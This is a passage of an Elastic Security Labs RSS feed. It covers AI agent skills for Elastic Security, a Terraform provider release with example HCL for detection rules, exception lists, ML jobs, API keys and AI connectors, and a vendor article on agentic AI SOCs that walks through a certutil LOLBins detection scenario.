<p>These aren't random events. Every alert maps to <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/mitre-attandckr-coverage"><strong>MITRE ATT&amp;CK</strong></a> techniques. Process trees have proper entity IDs so the <strong>Analyzer</strong> renders real parent-child relationships. <strong>Attack Discovery</strong> picks up the correlated threat narratives. You get the experience of a live environment without needing one.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image4.png" alt="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." title="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." /></p>
<p>When you're done exploring, ask your AI coding agent to remove the sample data. All sample events, alerts, and cases are cleaned up without affecting the rest of your environment.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image2.png" alt="Terminal output confirming that sample events, alerts, and cases have been removed." title="Terminal output confirming that sample events, alerts, and cases have been removed." /></p>
<h3>Step 3: What's next after sample data</h3>
<p>Once your environment is populated, the same AI coding agent can help you work with it. We're also shipping skills for <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/alert-triage"><strong>alert triage</strong></a> (fetch and investigate alerts, classify threats, and acknowledge alerts), <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/detection-rule-management"><strong>detection rule management</strong></a> (find noisy rules, add exceptions, and create new coverage), and <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/case-management"><strong>case management</strong></a> (create and track security operations center [SOC] cases and link alerts to incidents).</p>
<h3>Why skills, not just docs?</h3>
<p>Elastic's API documentation is <a href="https://www.elastic.co/docs/api/">public</a>. Your AI agent can already read it. So why do skills matter?</p>
<p>Skills matter because docs describe individual endpoints, while skills encode entire workflows. There's a real gap between knowing that <code>POST /api/detection_engine/signals/search</code> exists and knowing that you need to fetch the oldest unacknowledged alert, query the process tree and related alerts within a five-minute window of the trigger time, check for an existing case before creating a new one, attach the alert with its rule UUID, and then acknowledge all related alerts on the same host, in that order, with the right field names, across three different APIs.</p>
<p>Skills also encode what <em>not</em> to do: Never display credentials in chat, confirm before creating billable resources, and handle Serverless-specific API quirks. This is the expert knowledge that turns a general-purpose AI agent into one that actually knows Elastic.</p>
<h3>Get started</h3>
<p>All <a href="https://github.com/elastic/agent-skills">skills</a> are open source and work with any supported AI coding agent:</p>
<ul>
<li>Cursor</li>
<li>Claude Code</li>
<li>GitHub Copilot</li>
<li>Windsurf</li>
<li>Cline</li>
<li>OpenCode</li>
<li>Gemini CLI</li>
</ul>
<p>Open a terminal in your project workspace and run:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image3.png" alt="Code line: npx skills add elastic/agent-skills." title="Code line: npx skills add elastic/agent-skills" /></p>
<p>Or install specific skills:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image5.png" alt="Code lines to add specific skills." title="Code lines to add specific skills." /></p>
<p>Check out the full catalog at <a href="https://github.com/elastic/agent-skills">github.com/elastic/agent-skills</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/agent-skills-elastic-security.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Manage your Elastic security stack as code with the Elastic Stack Terraform provider]]></title>
            <link>https://www.elastic.co/security-labs/manage-elastic-with-terraform</link>
            <guid>manage-elastic-with-terraform</guid>
            <pubDate>Fri, 27 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[From detection rules to AI connectors - the latest Terraform provider releases bring security, observability, and ML capabilities to your infrastructure-as-code workflows.]]></description>
            <content:encoded><![CDATA[<p>The <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform provider</a> has reached a significant milestone. Starting with release v0.13.1, you can manage your Elastic security posture - detection rules, exception lists, and prebuilt rules - alongside ML anomaly detection jobs, synthetics monitors, and AI connectors, all as code.</p>
<p>This brings your detection logic and ML jobs into the same versioned, peer-reviewed workflow as your core clusters. It ensures your security posture and AI connectors are no longer manual outliers in an otherwise automated environment.</p>
<h2>The challenge: Security and observability configuration at scale</h2>
<p>As Elastic deployments grow, so does the complexity of managing them. Security teams maintain hundreds of detection rules. SREs configure monitoring across dozens of clusters. ML engineers tune anomaly detection jobs across multiple environments. All of these configurations must be consistent, auditable, and reproducible.</p>
<p>Without infrastructure as code, teams face two problems:</p>
<ol>
<li>
<p><strong>Configuration drift.</strong> Rules, policies, and monitors are created manually through the Kibana UI. Over time, production and staging diverge. No one is sure which version of a detection rule is running where.</p>
</li>
<li>
<p><strong>Buried audit trail.</strong> When a detection rule changes or an exception is added, there's no pull request to review, no commit history to trace, and no rollback path if something breaks. Reconstructing that history after the fact takes significant manual effort.</p>
</li>
</ol>
<p><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform provider</a> solves this by bringing these configurations into the same version-controlled, peer-reviewed workflow that teams already use for infrastructure.</p>
<h2>Security artifacts as code: Detection rules, exceptions, and prebuilt rules</h2>
<p>You can now manage the full lifecycle of Elastic Security detection rules through Terraform.</p>
<h3>Detection rules</h3>
<p>The <code>elasticstack_kibana_security_detection_rule</code> resource lets you define, version, and deploy detection rules in the <a href="https://github.com/hashicorp/hcl">HashiCorp Configuration Language</a> (HCL) format:</p>
<pre><code>resource &quot;elasticstack_kibana_security_detection_rule&quot; &quot;suspicious_admin_logon&quot; {
  name        = &quot;Suspicious Admin Logon Activity&quot;
  type        = &quot;query&quot;
  query       = &quot;event.action:logon AND user.name:admin&quot;
  language    = &quot;kuery&quot;
  enabled     = true
  description = &quot;Detects suspicious admin logon activities&quot;
  severity    = &quot;high&quot;
  risk_score  = 75
  from        = &quot;now-6m&quot;
  to          = &quot;now&quot;
  interval    = &quot;5m&quot;
  tags        = [&quot;security&quot;, &quot;authentication&quot;, &quot;admin&quot;]
}
</code></pre>
<p>This means your detection rules live in Git, undergo code review, and are deployed consistently across environments. No more clicking through the Kibana UI to replicate rules from staging to production.</p>
<p><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Detection rule resource docs</a></p>
<h3>Exception lists and items</h3>
<p>The security-as-code story extends to a full suite of exception management resources:</p>
<ul>
<li><code>elasticstack_kibana_security_exception_list</code> - Create and manage exception lists</li>
<li><code>elasticstack_kibana_security_exception_item</code> - Define individual exception items within a list</li>
<li><code>elasticstack_kibana_security_list</code> and <code>elasticstack_kibana_security_list_item</code> - Manage value lists for IP allowlists, file hashes, and other indicators</li>
<li><code>elasticstack_kibana_security_list_data_streams</code> - Associate lists with specific data streams</li>
</ul>
<p>Here's an example that ties them together - an exception list with items that suppress known false positives for a detection rule:</p>
<pre><code>resource &quot;elasticstack_kibana_security_exception_list&quot; &quot;vuln_scanner_exceptions&quot; {
  list_id        = &quot;vuln-scanner-exceptions&quot;
  name           = &quot;Vulnerability Scanner Exceptions&quot;
  description    = &quot;Suppress alerts from authorized vulnerability scanners&quot;
  type           = &quot;detection&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;security&quot;, &quot;vulnerability-scanning&quot;]
}

resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;nessus_scanner&quot; {
  list_id        = elasticstack_kibana_security_exception_list.vuln_scanner_exceptions.list_id
  item_id        = &quot;nessus-scanner&quot;
  name           = &quot;Nessus Scanner - Authorized&quot;
  description    = &quot;Suppress alerts from authorized Nessus scanner hosts&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;

  entries = [
    {
      type     = &quot;match&quot;
      field    = &quot;source.ip&quot;
      operator = &quot;included&quot;
      value    = &quot;10.0.50.10&quot;
    },
    {
      type     = &quot;match_any&quot;
      field    = &quot;process.name&quot;
      operator = &quot;included&quot;
      values   = [&quot;nessus&quot;, &quot;nessusd&quot;]
    }
  ]

  tags = [&quot;nessus&quot;, &quot;authorized-scanner&quot;]
}

resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;qualys_scanner&quot; {
  list_id        = elasticstack_kibana_security_exception_list.vuln_scanner_exceptions.list_id
  item_id        = &quot;qualys-scanner&quot;
  name           = &quot;Qualys Scanner - Authorized&quot;
  description    = &quot;Suppress alerts from authorized Qualys scanner subnet&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;

  entries = [
    {
      type     = &quot;match&quot;
      field    = &quot;source.ip&quot;
      operator = &quot;included&quot;
      value    = &quot;10.0.51.0/24&quot;
    }
  ]

  tags = [&quot;qualys&quot;, &quot;authorized-scanner&quot;]
}
</code></pre>
<p>The exception list and its items are linked by <code>list_id</code>, so Terraform manages the dependency graph automatically. Adding a new authorized scanner is a one-line PR - no clicking through the Kibana UI, no risk of forgetting which environment got the update.</p>
<h3>Prebuilt security rules</h3>
<p>The <code>elasticstack_kibana_prebuilt_rule</code> resource lets you manage Elastic's prebuilt detection rules via Terraform. This is particularly valuable for organizations that need to track which prebuilt rules are enabled, customize their parameters, and ensure consistent deployment across environments.</p>
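<p>A minimal HCL sketch of what this can look like, with the caveat that the <code>rule_id</code> shown is a placeholder and the exact attribute set should be checked against the resource docs for your provider version:</p>
<pre><code>resource &quot;elasticstack_kibana_prebuilt_rule&quot; &quot;example&quot; {
  # Placeholder: the signature ID of the prebuilt rule to enable
  rule_id = &quot;00000000-0000-0000-0000-000000000000&quot;
  enabled = true
}
</code></pre>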
<h2>ML anomaly detection as code</h2>
<p>Machine learning anomaly detection is one of Elasticsearch's most powerful capabilities - but managing ML jobs across environments has traditionally been a manual process. You create a job in the Kibana UI, tune the detectors, configure the datafeed, and hope someone documents the settings so they can be replicated in the next environment.</p>
<p>The <code>elasticstack_elasticsearch_ml_anomaly_detection_job</code> resource changes that. You can now define the full configuration of an anomaly detection job in HCL - detectors, bucket spans, influencers, data feeds, and analysis limits - and deploy it consistently across dev, staging, and production.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_ml_anomaly_detection_job&quot; &quot;cpu_anomalies&quot; {
  job_id      = &quot;high-cpu-by-host&quot;
  description = &quot;Detect unusual CPU usage patterns&quot;

  analysis_config = {
    bucket_span = &quot;15m&quot;
    detectors   = [{
      function   = &quot;high_mean&quot;
      field_name = &quot;system.cpu.user_pct&quot;
    }]
    influencers = [&quot;host.name&quot;]
  }

  data_description = {
    time_field = &quot;@timestamp&quot;
  }
}
</code></pre>
<p>This matters for teams that rely on ML to catch infrastructure anomalies, unusual user behavior, or security threats. Instead of manually recreating jobs when spinning up new clusters or recovering from failures, the entire ML configuration lives in version control - reviewable, repeatable, and recoverable.</p>
<h2>Cross-cluster automation with API keys</h2>
<p>For organizations running multiple Elasticsearch clusters, the provider now supports <strong>cluster API keys for cross-cluster search (CCS) and cross-cluster replication (CCR)</strong>. You can create API keys specifically designed for secure cross-cluster communication, enabling end-to-end automation of multi-cluster architectures.</p>
<p>This means you can provision two clusters, configure CCS/CCR between them, and set up the necessary security credentials - all in a single Terraform configuration.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_security_api_key&quot; &quot;ccs_key&quot; {
  name = &quot;cross-cluster-search-key&quot;
  type = &quot;cross_cluster&quot;

  access = {
    search = [{
      names = [&quot;logs-*&quot;, &quot;metrics-*&quot;]
    }]
    replication = [{
      names = [&quot;archive-*&quot;]
    }]
  }

  expiration = &quot;90d&quot;

  metadata = jsonencode({
    environment = &quot;production&quot;
    purpose     = &quot;ccs-ccr-between-prod-clusters&quot;
    team        = &quot;platform&quot;
  })
}
</code></pre>
<p>When the <code>type</code> is set to <code>cross_cluster</code>, the API key is scoped to CCS/CCR operations. You define which index patterns are accessible for search and replication, set an expiration policy, and tag the key with metadata - all reviewable in a pull request.</p>
<p>Learn more about <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/elasticsearch_security_api_key">API key resources</a> in the documentation.</p>
<h2>AI connectors as code</h2>
<p>The provider now supports <code>.bedrock</code> and <code>.gen-ai</code> connectors, bringing AI infrastructure into your Terraform workflows. As teams increasingly integrate large language models into their Elastic workflows - for AI assistants, attack discovery, and automated investigations - managing these connector configurations as code becomes essential.</p>
<pre><code>resource &quot;elasticstack_kibana_action_connector&quot; &quot;bedrock&quot; {
  name              = &quot;aws-bedrock&quot;
  connector_type_id = &quot;.bedrock&quot;
  config = jsonencode({
    apiUrl       = &quot;https://bedrock-runtime.us-east-1.amazonaws.com&quot;
    defaultModel = &quot;anthropic.claude-v2&quot;
  })
  secrets = jsonencode({
    accessKey = var.aws_access_key
    secret    = var.aws_secret_key
  })
}

resource &quot;elasticstack_kibana_action_connector&quot; &quot;openai&quot; {
  name              = &quot;openai&quot;
  connector_type_id = &quot;.gen-ai&quot;
  config = jsonencode({
    apiProvider  = &quot;OpenAI&quot;
    apiUrl       = &quot;https://api.openai.com/v1/chat/completions&quot;
    defaultModel = &quot;gpt-4&quot;
  })
  secrets = jsonencode({
    apiKey = var.openai_api_key
  })
}
</code></pre>
<p>With these connectors defined in Terraform, you can version your AI integration configuration alongside the rest of your Elastic infrastructure - and swap models or providers through a simple PR.</p>
<h2>Observability enhancements</h2>
<h3>Synthetics monitors</h3>
<p>The <code>elasticstack_kibana_synthetics_monitor</code> resource now includes a <code>labels</code> field, enabling better organization and filtering of synthetic checks. Labels let you tag monitors by team, environment, or service, making it easier to manage synthetic monitoring at scale.</p>
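<p>In Terraform, adopting the new field is a single map attribute on the monitor resource. The sketch below is illustrative only - attribute names other than <code>labels</code> are assumptions and may differ from the actual monitor schema, so check the resource documentation:</p>
<pre><code>resource &quot;elasticstack_kibana_synthetics_monitor&quot; &quot;checkout&quot; {
  name      = &quot;checkout-flow&quot;
  schedule  = 10
  locations = [&quot;us_east&quot;]

  http = {
    url = &quot;https://example.com/checkout&quot;
  }

  # New: key-value labels for organizing and filtering monitors
  labels = {
    team        = &quot;payments&quot;
    environment = &quot;production&quot;
    service     = &quot;checkout&quot;
  }
}
</code></pre>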
<h2>Additional platform improvements</h2>
<p>Recent releases also included several resources and attributes that round out the provider's coverage:</p>
<ul>
<li><code>elasticstack_elasticsearch_alias</code> - Manage Elasticsearch aliases as a dedicated resource</li>
<li><code>elasticstack_kibana_default_data_view</code> - Set the default data view for a Kibana space</li>
<li><code>solution</code> attribute on <code>elasticstack_kibana_space</code> - Configure the solution type for Kibana spaces (available from 8.16)</li>
<li>Fleet agent policy enhancements - <code>host_name_format</code> for configuring hostname vs. FQDN, and <code>required_versions</code> for version pinning</li>
</ul>
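<p>A rough sketch of how a couple of these look in practice - attribute names here are illustrative and should be verified against the resource documentation:</p>
<pre><code>resource &quot;elasticstack_elasticsearch_alias&quot; &quot;logs_current&quot; {
  name    = &quot;logs-current&quot;
  indices = [&quot;logs-2026.04&quot;]
}

resource &quot;elasticstack_kibana_space&quot; &quot;security&quot; {
  space_id = &quot;security&quot;
  name     = &quot;Security&quot;
  solution = &quot;security&quot; # available from 8.16
}
</code></pre>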
<h2>Getting started</h2>
<p>If you're already using the Elastic Stack Terraform provider, upgrade to the latest provider version to get all of these capabilities:</p>
<pre><code>terraform {
  required_providers {
    elasticstack = {
      source  = &quot;elastic/elasticstack&quot;
      version = &quot;~&gt; 0.14&quot;
    }
  }
}
</code></pre>
<p>If you're new to managing your Elastic Stack with Terraform, start with the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">provider documentation</a> on the Terraform registry.</p>
<p>To start using Elastic Cloud today, log in to the <a href="https://cloud.elastic.co/">Elastic Cloud console</a> or sign up for a <a href="https://cloud.elastic.co/registration">free trial</a>.<br />
For the full set of changes, check out the <a href="https://github.com/elastic/terraform-provider-elasticstack/releases">release notes on GitHub</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/manage-elastic-with-terraform/manage-elastic-with-terraform.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Why 2026 is the Year to Upgrade to an Agentic AI SOC]]></title>
            <link>https://www.elastic.co/security-labs/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc</link>
            <guid>why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc</guid>
            <pubDate>Fri, 27 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Agentic AI SOCs differ from copilot-only models by autonomously prioritizing attacks over alerts, executing closed-loop containment, and providing traceable reasoning for every decision, allowing analysts to focus on high-value investigations.]]></description>
            <content:encoded><![CDATA[<h1><strong>Why 2026 Is the Year to Upgrade to an Agentic AI SOC</strong></h1>
<p>The shift from AI-assisted tooling to agentic, AI-native security operations is no longer theoretical. It is entering production at scale, and 2026 represents the practical inflection point for enterprise SOCs. Agent frameworks are stabilizing, defenses against agent-specific attacks are maturing, and executive stakeholders increasingly demand AI-driven outcomes that are transparent, explainable, and auditable.</p>
<p>Nearly two-thirds of organizations are already experimenting with AI agents, yet fewer than one in four have deployed them into production. That gap signals a transition moment. As governance models, architecture standards, and risk controls mature through 2026, adoption is expected to accelerate rapidly. At the same time, the market for agentic capabilities is projected to grow sharply through 2030, underscoring that this is not a short-term trend but a structural transformation.</p>
<p>Taken together, these signals make 2026 the year to move from pilot to platform. The operational payoff is clear: faster triage, more precise investigations, and automated response that prioritizes attacks over alerts, explains decisions with evidence, and scales safely under real-world enterprise constraints.</p>
<h2><strong>The Rise of Agentic AI in Security Operations</strong></h2>
<p>Agentic AI refers to systems that can plan, act, and adapt without step-by-step human guidance. These systems use evolving context and often coordinate multiple agents to solve complex problems. They can perceive their environment, reason about what they observe, plan a sequence of actions, and execute them, using the tools assigned to them, to achieve specific goals without human intervention.</p>
<p>In a Security Operations Center (SOC), the team responsible for monitoring, detecting, and responding to cyber threats, agentic AI enables agents to gather context, analyze signals, take controlled actions, and learn from each outcome across triage, investigation, and response.</p>
<p>What began as “copilots” helping SOC analysts write queries is now evolving into autonomous systems capable of reasoning, acting, and adapting across complex investigations.</p>
<p>An agentic AI SOC differs from a traditional “copilot-only” SOC in three key ways:</p>
<ul>
<li>
<p><strong>Prioritization:</strong> Correlates multi-modal telemetry and adversary intent to identify complete attack chains rather than isolated alerts.</p>
</li>
<li>
<p><strong>Closed Loops:</strong> Moves beyond detection into containment, executing automated workflows and leveraging safe tool access to resolve threats at machine speed.</p>
</li>
<li>
<p><strong>Transparency:</strong> Provides traceable context and citations for every action. Without this transparency, an agentic SOC would be a &quot;<strong>black box</strong>,&quot; making it impossible for analysts to verify, trust, or safely override decisions.</p>
</li>
</ul>
<p>By automating routine enrichment and research tasks, correlating alerts into meaningful attack chains, and executing safe response actions, agentic AI enables SOC analysts to focus on high-value investigations while maintaining full visibility and control.</p>
<h3><strong>Key Drivers Behind the Agentic AI Inflection Point</strong></h3>
<p>Three forces are driving the transition to agentic AI SOCs:</p>
<ul>
<li><strong>Scaling and standardization pressure:</strong> Many SOCs have experimented with AI agents but lack mature production practices. Leaders are enforcing architecture standards, governance controls, and operational policies to move beyond pilots.</li>
<li><strong>Escalating threat landscape:</strong> Attackers are using stealthier, multi-stage techniques, often AI-enhanced or even AI-created, that blend into legitimate activity and move faster than manual workflows can handle. SOCs must adopt autonomous, goal-driven systems to continuously correlate signals and respond at scale without losing control.</li>
<li><strong>Maturing ecosystem:</strong> Agentic attacks and defenses are evolving in parallel, creating demand for new SOC tooling, multi-agent visibility, and operational guardrails for safe, scalable deployment.</li>
</ul>
<p>These drivers make adopting an agentic AI SOC both operationally and economically compelling, enabling faster triage, more precise investigations, and automated response. Analysts can focus on validated, correlated attack activity instead of individual noisy alerts, while decisions remain evidence-based and transparent, allowing organizations to scale safely under real-world constraints.</p>
<h2><strong>Operationalizing an Agentic SOC: Challenges and Recommendations</strong></h2>
<p>Scaling autonomous AI agents across an enterprise SOC introduces operational, governance, and economic challenges. Below are key challenges and recommended approaches to address them:</p>
<table>
<thead>
<tr>
<th>Challenge</th>
<th>Recommendation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Early automation efforts target low-impact or low-noise tasks</td>
<td>Focus on high-volume, repetitive tasks such as triaging risky LOLBin executions or failed logins, where automation delivers immediate ROI and reduces analyst workload.</td>
</tr>
<tr>
<td>Agents performing actions outside their intended scope</td>
<td>Treat agents as Non-Human Identities (NHIs), enforce least-privilege access to tools, and require human approval for high-impact actions.</td>
</tr>
<tr>
<td>Agents behaving inconsistently or unpredictably</td>
<td>Treat prompts as code: version-control and rigorously test system prompts to ensure repeatable and reliable performance.</td>
</tr>
<tr>
<td>Overloading a single agent or fragmenting the SOC with multiple domain-specific agents</td>
<td>Deploy a unified agent that dynamically loads task-specific instructions and tools on demand, keeping the core system lightweight.</td>
</tr>
<tr>
<td>SOC analysts unsure of or unable to trust autonomous decisions</td>
<td>Prioritize explainability with RAG and transparent reasoning traces so every autonomous step is verifiable and grounded in evidence.</td>
</tr>
<tr>
<td>Costs growing uncontrollably as agent deployment scales</td>
<td>Implement per-agent budgets, rate limits, and usage monitoring to manage token consumption and tool invocation expenses.</td>
</tr>
<tr>
<td>Bloated system prompts increasing token costs and reducing agent accuracy</td>
<td>Adopt an architecture where the agent pulls in targeted behavioral packages only when triggered by specific analyst intents or data context.</td>
</tr>
<tr>
<td>Agents or automation workflows being exploited by attackers</td>
<td>Continuously test defenses via red-team exercises against agents and prompts to proactively identify and remediate vulnerabilities such as prompt injection.</td>
</tr>
</tbody>
</table>
<h2><strong>The Elastic Blueprint: Essential Capabilities for an Agentic SOC</strong></h2>
<p>To move from manual intervention to an autonomous &quot;agentic loop,&quot; an enterprise-ready SOC must deliver measurable improvements across the entire triage -&gt; investigation -&gt; response lifecycle.</p>
<p>The following table outlines the essential elements of an agentic SOC platform and how Elastic Security operationalizes them:</p>
<table>
<thead>
<tr>
<th align="left">Elements</th>
<th align="left">What &quot;Good&quot; Looks Like in an Agentic SOC</th>
<th align="left">How Elastic Supports</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Enterprise Scalability</strong></td>
<td align="left">Continuously reason across hybrid-cloud and on-premises telemetry, scaling autonomous threat detection and response across large, distributed enterprises.</td>
<td align="left">Elastic Security provides <strong>unified visibility</strong> by ingesting data from any source, including cloud, identity, and endpoint, giving you a mature foundation for large-scale, automated enterprise defense. By consolidating all telemetry into a single platform, agents gain the broad visibility they need to reason across domains.</td>
</tr>
<tr>
<td align="left"><strong>Attack Prioritization</strong></td>
<td align="left"><strong>Prioritizing attacks</strong> over alerts by correlating signals to identify high-risk campaigns.</td>
<td align="left"><a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery"><strong>Elastic Attack Discovery</strong></a> uses AI to filter out noise, correlating isolated events into a single coherent attack chain so SOC analysts can focus on the most critical threats.</td>
</tr>
<tr>
<td align="left"><strong>Accurate Detection</strong></td>
<td align="left"><strong>Faster and more accurate threat detection</strong> using behavioral baselines rather than static signatures.</td>
<td align="left"><a href="https://www.elastic.co/security-labs">Elastic Security Labs</a> provides expert-driven detection rules for emerging threats, while <a href="https://www.elastic.co/security/xdr"><strong>Elastic XDR</strong></a> stops attacks across endpoints and clouds. This defense leverages Elastic’s machine learning and entity analytics to detect behavioral anomalies beyond static signatures. It monitors user and host activity, correlates events across systems, and uses endpoint behavioral analysis to identify suspicious patterns in real time.</td>
</tr>
<tr>
<td align="left"><strong>Custom agent builder</strong></td>
<td align="left">Agents operate toward defined objectives with multi-step reasoning and controlled tool access.</td>
<td align="left"><strong><a href="https://www.elastic.co/elasticsearch/agent-builder">Elastic Agent Builder</a></strong> enables the creation of custom AI agents by connecting tools such as ES|QL queries, search tools, and workflows.</td>
</tr>
<tr>
<td align="left"><strong>Incident Response orchestration</strong></td>
<td align="left">Predictable execution for known scenarios, adaptive reasoning for complex ones, with analyst control at every stage.</td>
<td align="left"><a href="https://www.elastic.co/elasticsearch/workflows"><strong>Elastic Workflows</strong></a> handle the deterministic orchestration of triggers, sequencing, and response actions, while Agent Builder manages the AI reasoning. Seamlessly integrated, agents can call Workflows through conversations and Workflows can call Agents during orchestration. Human-in-the-loop controls ensure every automated step is backed by traceable evidence, allowing SOC analysts to override the system at any point.</td>
</tr>
<tr>
<td align="left"><strong>Flexible LLM Integration</strong></td>
<td align="left">A platform that <strong>supports your choice of LLM</strong> to avoid vendor lock-in and optimize for cost or privacy.</td>
<td align="left"><strong>Elastic</strong> offers choice and control by letting you bring your own LLM. You can use OpenAI, Amazon Bedrock, Google Gemini, or local models to drive autonomous reasoning while maintaining full data sovereignty. For customers who prefer a turnkey experience, Elastic provides managed LLMs out of the box, ensuring that the power of an agentic SOC is accessible regardless of your preferred infrastructure.</td>
</tr>
<tr>
<td align="left"><strong>Transparent Reasoning</strong></td>
<td align="left">Explanations with clear evidence trails and source links.</td>
<td align="left">In Elastic, agent reasoning provides a transparent trace of all tools used and decisions made, giving full visibility into the agent’s logic, while RAG (Retrieval-Augmented Generation) ensures every investigation is grounded in your organization’s internal knowledge, linked evidence, and includes source citations.</td>
</tr>
<tr>
<td align="left"><strong>Guarded autonomy</strong></td>
<td align="left">Explicitly permitted tools, confidence thresholds, RBAC, and controlled response scope.</td>
<td align="left"><strong>Elastic</strong> lets you control the level of autonomy for your agents by managing assigned tools, alongside user- and API-level permissions and RBAC.</td>
</tr>
</tbody>
</table>
<h2><strong>How Elastic’s Agentic AI Automates the LOLBins Hunt</strong></h2>
<p>It’s 9:15 AM. Your SOC dashboard shows zero &quot;Critical&quot; alerts, yet low-priority telemetry is flooding in. Among this noise, a stealthy process is running certutil.exe to download a base64-encoded payload from a suspicious domain. LOLBins, or Living off the Land Binaries, are legitimate system tools such as certutil.exe or powershell.exe that attackers weaponize. Because these tools are trusted and digitally signed, their malicious use often blends into normal activity and goes unnoticed.</p>
<p>In a <strong>traditional SOC</strong>, this activity would not trigger an immediate response. Instead, it would likely remain hidden until a separate catastrophic event - such as the appearance of a ransomware note - forced a manual hunt. An analyst would then have to painstakingly backtrack, sifting through proxy logs, running complex queries, and manually decoding strings to confirm that certutil.exe had been weaponized. By that time, the attacker has usually already achieved their objective.</p>
<p>In an <strong>Agentic SOC</strong>, the work is already done. The agent has detected, enriched, and confirmed the threat, created a case, and sent notifications, all before you’ve even had your coffee.</p>
<p>Let’s see how it’s done with Elastic.</p>
<div class="youtube-video-container">
    <iframe width="560" height="315" src="https://www.youtube.com/embed/rkno8LsFWls?si=l3GA40Yoq7hs9LQr" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div>
<h3><strong>Detection: Uncovering Hidden Threats</strong></h3>
<p>Elastic's Attack Discovery correlates multiple alerts to reveal a complete attack narrative. When certutil.exe executes in an unusual context, detection rules generate alerts, which Attack Discovery links with the originating phishing email and any related telemetry. The result is a unified story that shows not only the certutil.exe execution but also what the attacker attempted, how the payload was delivered, and the full sequence of malicious activity across the environment.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/image5.png" alt="Attack Discovery showing correlated certutil events" /></p>
<h3><strong>Autonomous Enrichment: Gathering the Evidence</strong></h3>
<p>Elastic Workflows can invoke agents on a schedule (e.g., nightly threat hunts) or in response to events (e.g., a new Attack Discovery finding) to operate automatically and gather evidence without human intervention.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/image4.png" alt="Workflow that orchestrates agent call" /></p>
<p>When invoked, the agent investigates suspicious activity by analyzing file paths to identify malicious files, querying DNS logs to determine the IP resolution for the command-and-control domain, and searching firewall logs across clusters using ES|QL, Elastic’s piped query language, to confirm whether the traffic is allowed. This automated process allows the agent to collect and correlate critical signals across the environment without manual effort.</p>
<p>Every interaction with the agent is captured in a <strong>reasoning trace</strong>, recording each step the agent takes, including queries run, tools used, and enrichment results. This provides full transparency and auditability, and within the Agent Builder UI, SOC analysts can view these traces for complete visibility into how the agent reached its conclusions, the actions it performed, and the evidence it collected.</p>
<p>The screenshot below shows the reasoning trace of the agent and the tools it used during this investigation.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/image2.png" alt="Agent enriches detection with multiple data sources to validate potential malicious activity" /></p>
<h3><strong>Verdict &amp; Reasoning: Confirming the Threat</strong></h3>
<p>The agent checks VirusTotal for the second suspicious DLL, <strong>cdnver.dll</strong>, confirming its malicious classification and providing a verdict that this is a true positive.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/image1.png" alt="Reasoning Trace showing evidence, risk score and verdict" /></p>
<h3><strong>Case Opened: Accelerating Resolution through Autonomous Action</strong></h3>
<p>Once confirmed, the agent automatically creates a case, maps the activity to MITRE ATT&amp;CK, and sends email notifications to stakeholders. SOC analysts receive a fully pre-investigated case rather than raw logs, allowing them to focus on remediation rather than investigation.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/image3.png" alt="Case automatically created by the SOC agent" /></p>
<h3><strong>Behind the Scenes: Building the Agent</strong></h3>
<p>The agent’s autonomy and reasoning tasks stem from its initial setup in the <strong>Elastic Agent Builder</strong>. By predefining the tools it can use, the goals it must pursue, and the schedule it follows, the agent can operate independently while the SOC team focuses on strategic oversight.</p>
<p>This model works because it transforms the SOC from a reactive posture to a proactive one. Elastic’s Attack Discovery correlates alerts generated by detection rules into a coherent attack chain, ensuring that stealthy activity does not remain buried in low-priority noise. The agents then confirm true positives automatically and close the loop with immediate case creation and notifications, drastically reducing dwell time. Most importantly, every step is auditable and transparent, providing the traceable context SOC analysts need to maintain full confidence in AI-driven operations and intervene only when human judgment is required.</p>
